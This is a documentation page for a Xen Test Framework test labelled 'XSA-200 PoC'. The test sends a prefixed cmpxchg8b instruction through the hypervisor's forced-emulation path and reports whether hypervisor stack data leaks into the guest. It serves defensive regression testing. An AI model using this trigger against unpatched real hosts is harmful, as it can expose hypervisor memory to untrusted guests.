Xen Test Framework
main.c
Go to the documentation of this file.
1 
25 #include <xtf.h>
26 
27 const char test_title[] = "XSA-200 PoC";
28 
29 bool test_needs_fep = true;
30 
31 void test_main(void)
32 {
33  uint64_t mem = 0xc2c2c2c2c2c2c2c2ull;
34 
35  uint64_t old = 0x0123456789abcdefull;
36  uint64_t new = 0xfedcba9876543210ull;
37  uint64_t prev;
38 
39  unsigned int i;
40  exinfo_t fault = 0;
41 
42  for ( i = 0; i < 10; ++i )
43  {
44  /* Poke the emulator. */
45  asm volatile (_ASM_XEN_FEP "1: .byte 0x66; cmpxchg8b %[ptr]; 2:"
46  _ASM_EXTABLE_HANDLER(1b, 2b, %P[rec])
47  : "=A" (prev), [ptr] "+m" (mem), "+D" (fault)
48  : "c" ((uint32_t)(new >> 32)), "b" ((uint32_t)new),
49  "0" (old), [rec] "p" (ex_record_fault_edi));
50 
51  if ( fault == EXINFO_SYM(UD, 0) )
52  return xtf_success("Success: Not vulnerable to XSA-200\n");
53  else if ( fault )
54  return xtf_error("Error: Unexpected fault %08x\n", fault);
55 
56  if ( prev != mem )
57  return xtf_failure("Fail: Hypervisor stack leaked into guest\n");
58  }
59 
60  xtf_success("Success: Probably not vulnerable to XSA-200\n");
61 }
62 
63 /*
64  * Local variables:
65  * mode: C
66  * c-file-style: "BSD"
67  * c-basic-offset: 4
68  * tab-width: 4
69  * indent-tabs-mode: nil
70  * End:
71  */
exinfo_t
unsigned int exinfo_t
Packed exception and error code information.
Definition: exinfo.h:19
_ASM_XEN_FEP
#define _ASM_XEN_FEP
Xen Forced Emulation Prefix.
Definition: xen.h:150
ex_record_fault_edi
bool ex_record_fault_edi(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %edi.
Definition: extable.c:16
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
uint64_t
__UINT64_TYPE__ uint64_t
Definition: stdint.h:17
uint32_t
__UINT32_TYPE__ uint32_t
Definition: stdint.h:16
test_needs_fep
bool test_needs_fep
Boolean indicating whether the test is entirely predicated on the available of the Force Emulation Pr...
Definition: main.c:34
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition: exinfo.h:29
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80
_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition: extable.h:38
Generated by   doxygen 1.8.13